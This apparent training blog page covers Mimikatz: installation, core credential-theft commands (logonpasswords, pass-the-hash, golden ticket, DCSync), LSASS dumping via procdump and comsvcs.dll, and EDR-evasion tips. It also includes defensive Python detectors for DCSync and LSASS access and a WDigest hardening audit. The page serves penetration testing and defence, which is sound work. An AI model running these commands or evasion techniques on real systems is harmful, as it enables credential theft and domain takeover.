Mimikatz — Install, Use, Optimise (2026)

Manish Garg · Associate of (ISC)² · RingSafe
Apr 29, 2026
2 min read

The credential-extraction tool — pulls plaintext passwords, hashes, Kerberos tickets, and certs from Windows memory.

Use case: Active Directory
Difficulty: Advanced
Homepage: https://github.com/gentilkiwi/mimikatz

Installation

Pick the install method that matches your stack.

Pre-built EXE

Download from github.com/gentilkiwi/mimikatz/releases (heavily AV-flagged)

Compile from source

Visual Studio 2019+ → open mimikatz.sln → Build x64 Release

Pypykatz (Python port, lower detection)

pip install pypykatz

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

privilege::debug + sekurlsa::logonpasswords

mimikatz # privilege::debug; sekurlsa::logonpasswords

Pass-the-Hash

sekurlsa::pth /user:Administrator /domain:CORP /ntlm:HASH /run:cmd.exe

Golden ticket

kerberos::golden /user:fakeadmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500

DCSync (replicate creds from DC)

lsadump::dcsync /domain:corp.local /user:Administrator

Pypykatz LSASS dump

pypykatz lsa minidump lsass.dmp
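On the defensive side, the DCSync command above leaves a clear trace: the account issuing the replication request shows up in Windows Security event 4662 with AccessMask 0x100 and the directory-replication control-access rights in its Properties field. The following is an added example (not code from this page or from the mimikatz project) that flags such events when the subject is neither a domain-controller computer account nor an allowlisted directory-sync account. The sample events and the account names in them are constructed; the three replication-right GUIDs are the documented Active Directory extended rights.

```python
import re

# Control-access-right GUIDs that grant directory replication. A DCSync request
# exercises the first two (optionally the third). These are the documented AD
# extended-right GUIDs, not values taken from this page.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I
)


def replication_rights_used(properties: str) -> list:
    """Return the names of replication rights present in a 4662 Properties string."""
    return [
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(properties)
        if g.lower() in REPLICATION_RIGHTS
    ]


def find_dcsync(events, dc_accounts, allowlist=()):
    """Flag 4662 control-access events (AccessMask 0x100) in which a principal that
    is neither a DC computer account nor an allowlisted sync account exercised
    replication rights. Returns a list of (SubjectUserName, rights) tuples."""
    dcs = {a.upper() for a in dc_accounts}
    allowed = {a.upper() for a in allowlist}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if ev.get("AccessMask", "").lower() != "0x100":
            continue
        rights = replication_rights_used(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dcs or subject.upper() in allowed:
            continue
        hits.append((subject, rights))
    return hits


# Constructed sample events: field names follow the 4662 schema, all values are
# made up for this example. The "jdoe" record touches a user-class object
# (schema GUID bf967aba-...), which is ordinary directory access, not replication.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_1a2b3c4d", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    # DC01$ is the only DC; MSOL_1a2b3c4d stands in for an Azure AD Connect
    # account, which legitimately replicates and is therefore allowlisted.
    for subject, rights in find_dcsync(
        SAMPLE_EVENTS, dc_accounts=["DC01$"], allowlist=["MSOL_1a2b3c4d"]
    ):
        print(f"DCSync candidate: {subject} used {', '.join(rights)}")
```

Only svc_backup is reported for the sample set. In production the DC list should come from the directory itself rather than a hard-coded list, and the allowlist should be reviewed regularly, because a sync account that is granted replication rights is exactly the kind of principal an attacker will try to compromise.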

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

  • Direct execution is detected by every modern AV/EDR. Standard tradecraft: dump LSASS first (procdump, comsvcs.dll), parse offline with pypykatz.
  • procdump -ma lsass.exe lsass.dmp requires SeDebugPrivilege but is a signed Microsoft binary, so it bypasses many EDRs.
  • comsvcs.dll via rundll32 C:\Windows\System32\comsvcs.dll, MiniDump PID lsass.dmp full — LOLBAS, no upload needed.
  • pypykatz parses minidumps offline on the attacker box — no need to run mimikatz on victim.
  • For Credential Guard / LSA Protection bypass: kernel driver tricks (Skeleton Key, SafetyKatz). Way out of scope of basic engagements.

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

  • EVERY EDR vendor detects mimikatz signature, internal strings, AND behaviour. Default binary will not execute on prod EDR.
  • LSASS dumping itself is detected — many EDRs alert on any process opening LSASS handle.
  • sekurlsa::logonpasswords requires SYSTEM, not just admin. Use token::elevate if needed.
  • Storing dumped creds on disk = legal exposure even on authorised engagements. Encrypt + delete.
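The optimisation list above and the second pitfall both turn on the same fact: whatever tool does the dumping, a handle to lsass.exe has to be opened first, and Sysmon records that as Event ID 10 (ProcessAccess) with the requesting image and the access mask it was granted. The following is an added example (not from this page or the mimikatz project) of the triage logic a blue team would run over those records: ignore allowlisted system images, treat handles that include PROCESS_VM_READ (0x0010) or the full 0x1FFFFF mask as high severity, and downgrade query-only handles, which are common and noisy. The log lines are constructed in a simple key=value format rather than Sysmon's XML, and the allowlist is a placeholder to be tuned per environment.

```python
import re

# Process access rights from winnt.h that matter for reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS_MASK = 0x1FFFFF

# Constructed allowlist of images that routinely open LSASS on a typical host.
# In a real deployment key it on full path plus signer, not on the basename.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed log format: semicolon-separated key=value pairs.
FIELD_RE = re.compile(r"(\w+)=([^;]*)")


def parse_line(line: str) -> dict:
    return {k: v.strip() for k, v in FIELD_RE.findall(line)}


def classify(ev: dict, allowlist=ALLOWLIST):
    """Return None (ignore), 'low' or 'high' for one Sysmon Event ID 10 record."""
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    if ev.get("SourceImage", "").lower() in allowlist:
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    reads_memory = bool(granted & PROCESS_VM_READ) or granted == PROCESS_ALL_ACCESS_MASK
    # Query-only handles (e.g. 0x1000, 0x1400) cannot read memory: count them,
    # do not page on them.
    return "high" if reads_memory else "low"


def scan(lines):
    """Run classify() over raw log lines; returns (severity, image, mask) tuples."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        sev = classify(ev)
        if sev:
            findings.append((sev, ev["SourceImage"], ev["GrantedAccess"]))
    return findings


# Constructed sample log: one benign system handle, a sysinternals-style dumper,
# a rundll32 handle, a query-only handle from an unknown binary, an unrelated
# target, and a non-EID-10 record.
SAMPLE_LOG = [
    r"EventID=10;SourceImage=C:\Windows\System32\svchost.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1000",
    r"EventID=10;SourceImage=C:\Tools\procdump64.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1FFFFF",
    r"EventID=10;SourceImage=C:\Windows\System32\rundll32.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1410",
    r"EventID=10;SourceImage=C:\Users\jdoe\tool.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1400",
    r"EventID=10;SourceImage=C:\Users\jdoe\tool.exe;TargetImage=C:\Windows\System32\notepad.exe;GrantedAccess=0x1FFFFF",
    r"EventID=1;Image=C:\Windows\System32\cmd.exe",
]

if __name__ == "__main__":
    for sev, image, mask in scan(SAMPLE_LOG):
        print(f"[{sev.upper()}] {image} opened lsass.exe with {mask}")
```

The two high-severity hits are the procdump and rundll32 handles, which is consistent with the pitfall above: the dumping step is observable regardless of whether mimikatz itself ever touches the host. Pairing this with Sysmon's CallTrace field (unbacked or non-system modules in the call stack) reduces the remaining false positives from legitimate security agents.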

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

  • Rubeus — Kerberos-specific (tickets, TGT/TGS).
  • SafetyKatz — patched mimikatz with EDR evasion.
  • NanoDump — LSASS dumping with built-in evasion.

India context and engagement notes

Many Indian enterprises run unpatched Windows 2012 R2 / 2016 — Wdigest is often still enabled, meaning plaintext passwords in LSASS. Mimikatz on these remains devastatingly effective. Reporting: if you find Wdigest=1, that’s a Critical-severity finding under any framework.
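To turn the Wdigest finding above into something reproducible in a report, here is an added audit example (not from this page or the mimikatz project) that reads the three HKLM registry values governing credential caching and LSASS protection and grades them: WDigest UseLogonCredential (1 means plaintext passwords cached, the Critical case the paragraph describes), LSA Protection RunAsPPL, and the Credential Guard LsaCfgFlags value. The grading function is pure so it can be run against exported values from any host; read_settings() uses the standard winreg module and only returns data on Windows. Severity labels and the sample "unhardened 2012 R2 member server" values are constructed for the example.

```python
import sys

# HKLM subkeys that hold the values being audited.
WDIGEST_KEY = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"


def assess(settings: dict) -> list:
    """settings maps value name -> DWORD (int), or None when the value is absent.
    Returns a list of (severity, message) findings; an empty list means hardened."""
    findings = []

    ulc = settings.get("UseLogonCredential")
    if ulc == 1:
        findings.append(("Critical",
                         "WDigest UseLogonCredential=1: plaintext passwords are cached in LSASS"))
    elif ulc is None:
        # Absent is treated as disabled on Windows 8.1 / Server 2012 R2 and later;
        # older hosts with KB2871997 installed need the value explicitly set to 0.
        findings.append(("Info",
                         "WDigest UseLogonCredential absent: confirm OS version before "
                         "treating as disabled; set to 0 explicitly on pre-8.1/2012 R2 hosts"))

    if not settings.get("RunAsPPL"):          # None or 0
        findings.append(("High",
                         "LSA Protection (RunAsPPL) not enabled: unsigned code can open "
                         "LSASS with full access"))

    if not settings.get("LsaCfgFlags"):       # None or 0
        findings.append(("Medium",
                         "Credential Guard (LsaCfgFlags) not set in registry: confirm via "
                         "the Win32_DeviceGuard WMI class before reporting as disabled"))
    return findings


def read_settings():
    """Read the live values via winreg on Windows; returns None on other platforms."""
    if sys.platform != "win32":
        return None
    import winreg

    def dword(subkey, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                value, _ = winreg.QueryValueEx(key, name)
                return int(value)
        except OSError:          # key or value absent
            return None

    return {
        "UseLogonCredential": dword(WDIGEST_KEY, "UseLogonCredential"),
        "RunAsPPL": dword(LSA_KEY, "RunAsPPL"),
        "LsaCfgFlags": dword(LSA_KEY, "LsaCfgFlags"),
    }


if __name__ == "__main__":
    live = read_settings()
    # Constructed sample standing in for an unhardened 2012 R2 member server
    # when the script is not run on Windows.
    sample = live or {"UseLogonCredential": 1, "RunAsPPL": None, "LsaCfgFlags": None}
    for severity, message in assess(sample):
        print(f"[{severity}] {message}")
```

Run on the host with local administrator rights so the Lsa subkey is readable. Because the grading is separated from the collection, the same assess() can be fed values pulled by a configuration-management tool across a fleet, which is the practical way to scope the "Wdigest=1" finding across an estate rather than host by host.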


⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.

Want this for your team?

Custom team training + practitioner advisory

Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.
